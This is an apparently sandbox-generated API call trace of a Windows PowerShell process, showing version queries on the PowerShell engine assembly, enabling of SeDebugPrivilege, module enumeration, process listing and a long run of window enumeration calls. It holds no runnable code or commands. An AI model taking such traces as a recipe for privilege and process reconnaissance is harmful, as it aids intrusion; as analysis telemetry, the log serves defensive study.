	[0944.807] GetVersionExW (in: lpVersionInformation=0x1ad830*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad830*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.808] SetErrorMode (uMode=0x1) returned 0x1
	[0944.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad990 | out: lpFileInformation=0x1ad990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0944.810] SetErrorMode (uMode=0x1) returned 0x1
	[0944.813] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adc00 | out: lpdwHandle=0x1adc00) returned 0x94c
	[0944.816] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372f0 | out: lpData=0x2c372f0) returned 1
	[0944.818] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adb78, puLen=0x1adb70 | out: lplpBuffer=0x1adb78*=0x2c3738c, puLen=0x1adb70) returned 1
	[0944.820] lstrlenW (lpString="䅁") returned 1
	[0944.829] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c37468, puLen=0x1adae0) returned 1
	[0944.830] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0944.832] CoTaskMemAlloc (cb=0x2e) returned 0x3676b0
	[0944.832] lstrcpyW (in: lpString1=0x3676b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0944.833] CoTaskMemFree (pv=0x3676b0) 
	[0944.833] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c374bc, puLen=0x1adae0) returned 1
	[0944.833] lstrlenW (lpString="System.Management.Automation") returned 28
	[0944.833] CoTaskMemAlloc (cb=0x3c) returned 0x2e8f80
	[0944.833] lstrcpyW (in: lpString1=0x2e8f80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0944.834] CoTaskMemFree (pv=0x2e8f80) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c37518, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.834] CoTaskMemAlloc (cb=0x20) returned 0x36cd60
	[0944.834] lstrcpyW (in: lpString1=0x36cd60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.834] CoTaskMemFree (pv=0x36cd60) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c37558, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.834] CoTaskMemAlloc (cb=0x44) returned 0x2e8f80
	[0944.834] lstrcpyW (in: lpString1=0x2e8f80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.834] CoTaskMemFree (pv=0x2e8f80) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c375c0, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0944.834] CoTaskMemAlloc (cb=0x76) returned 0x30f2e0
	[0944.834] lstrcpyW (in: lpString1=0x30f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0944.834] CoTaskMemFree (pv=0x30f2e0) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c3765c, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.834] CoTaskMemAlloc (cb=0x44) returned 0x2e8f80
	[0944.834] lstrcpyW (in: lpString1=0x2e8f80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.834] CoTaskMemFree (pv=0x2e8f80) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c376c0, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0944.834] CoTaskMemAlloc (cb=0x58) returned 0x2c5740
	[0944.834] lstrcpyW (in: lpString1=0x2c5740, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0944.834] CoTaskMemFree (pv=0x2c5740) 
	[0944.834] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c3773c, puLen=0x1adae0) returned 1
	[0944.834] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.834] CoTaskMemAlloc (cb=0x20) returned 0x36cd60
	[0944.835] lstrcpyW (in: lpString1=0x36cd60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.835] CoTaskMemFree (pv=0x36cd60) 
	[0944.835] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x2c373e4, puLen=0x1adae0) returned 1
	[0944.835] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0944.835] CoTaskMemAlloc (cb=0x66) returned 0x2ec2f0
	[0944.835] lstrcpyW (in: lpString1=0x2ec2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0944.835] CoTaskMemFree (pv=0x2ec2f0) 
	[0944.835] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x0, puLen=0x1adae0) returned 0
	[0944.835] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x0, puLen=0x1adae0) returned 0
	[0944.835] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adae8, puLen=0x1adae0 | out: lplpBuffer=0x1adae8*=0x0, puLen=0x1adae0) returned 0
	[0944.835] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adab8, puLen=0x1adab0 | out: lplpBuffer=0x1adab8*=0x2c3738c, puLen=0x1adab0) returned 1
	[0944.836] CoTaskMemAlloc (cb=0x204) returned 0x311e70
	[0944.836] VerLanguageNameW (in: wLang=0x0, szLang=0x311e70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0945.514] CoTaskMemFree (pv=0x311e70) 
	[0945.514] VerQueryValueW (in: pBlock=0x2c372f0, lpSubBlock="\\", lplpBuffer=0x1adb08, puLen=0x1adb00 | out: lplpBuffer=0x1adb08*=0x2c37318, puLen=0x1adb00) returned 1
	[0945.520] GetCurrentProcessId () returned 0x1a74
	[0945.536] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1aca30 | out: lpLuid=0x1aca30*(LowPart=0x14, HighPart=0)) returned 1
	[0945.539] GetCurrentProcess () returned 0xffffffffffffffff
	[0945.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1aca50 | out: TokenHandle=0x1aca50*=0x2cc) returned 1
	[0945.541] AdjustTokenPrivileges (in: TokenHandle=0x2cc, DisableAllPrivileges=0, NewState=0x2c3ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0945.542] CloseHandle (hObject=0x2cc) returned 1
	[0945.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a74) returned 0x2cc
	[0946.262] EnumProcessModules (in: hProcess=0x2cc, lphModule=0x2c3abd0, cb=0x200, lpcbNeeded=0x1ada68 | out: lphModule=0x2c3abd0, lpcbNeeded=0x1ada68) returned 1
	[0946.264] GetModuleInformation (in: hProcess=0x2cc, hModule=0x13f370000, lpmodinfo=0x2c3ae40, cb=0x18 | out: lpmodinfo=0x2c3ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0946.266] CoTaskMemAlloc (cb=0x804) returned 0x36fdd0
	[0946.266] GetModuleBaseNameW (in: hProcess=0x2cc, hModule=0x13f370000, lpBaseName=0x36fdd0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0946.266] CoTaskMemFree (pv=0x36fdd0) 
	[0946.267] CoTaskMemAlloc (cb=0x804) returned 0x36fdd0
	[0946.267] GetModuleFileNameExW (in: hProcess=0x2cc, hModule=0x13f370000, lpFilename=0x36fdd0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0946.267] CoTaskMemFree (pv=0x36fdd0) 
	[0946.267] CloseHandle (hObject=0x2cc) returned 1
	[0946.275] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1a74) returned 0x2cc
	[0946.276] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x1adb98 | out: lpExitCode=0x1adb98*=0x103) returned 1
	[0946.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x1adb60 | out: SystemInformation=0x12c3b088, ResultLength=0x1adb60*=0x4a190) returned 0xc0000004
	[0946.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b0b8, Length=0x4c990, ResultLength=0x1adb60 | out: SystemInformation=0x12c5b0b8, ResultLength=0x1adb60*=0x4a190) returned 0x0
	[0946.938] EnumWindows (lpEnumFunc=0x29466ac, lParam=0x0) 
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x558
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x538
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x778
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x778
	[0947.861] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x460
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.862] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2440
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x24d8
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1aa4
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1ff0
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1a84
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1fb0
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1e10
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x23a8
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1f24
	[0947.863] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x21ec
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2320
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1fd4
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1880
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b18
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1d6c
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x233c
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2368
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2124
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x22f0
	[0947.864] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x22ac
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1cdc
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x10f0
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1f18
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x20a8
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2004
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1f88
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1f84
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2050
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1e04
	[0947.865] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1ecc
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1e64
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b58
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1e94
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1e28
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1df8
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1da8
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1c70
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x163c
	[0947.866] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1a10
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x186c
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1d74
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4c8
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1960
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1ce4
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b24
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x14e0
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x17f0
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x854
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1268
	[0947.867] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1624
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b9c
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x16f4
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x145c
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x17d0
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1d28
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xcb8
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1190
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x3a8
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1bd0
	[0947.868] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1bfc
	[0947.869] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1a78
	[0947.869] GetWindow (hWnd=0x108b8, uCmd=0x4) returned 0x0
	[0947.870] IsWindowVisible (hWnd=0x108b8) returned 0
	[0947.870] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b90
	[0947.870] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b04
	[0947.870] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b34
	[0947.870] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1b64
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1bb0
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1acc
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1a2c
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x19a8
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1944
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x18c8
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x18ac
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x18ec
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1898
	[0947.871] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc98
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x153c
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1808
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x12a4
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1740
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x16c4
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1820
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x16ac
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1858
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1664
	[0947.872] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x10b4
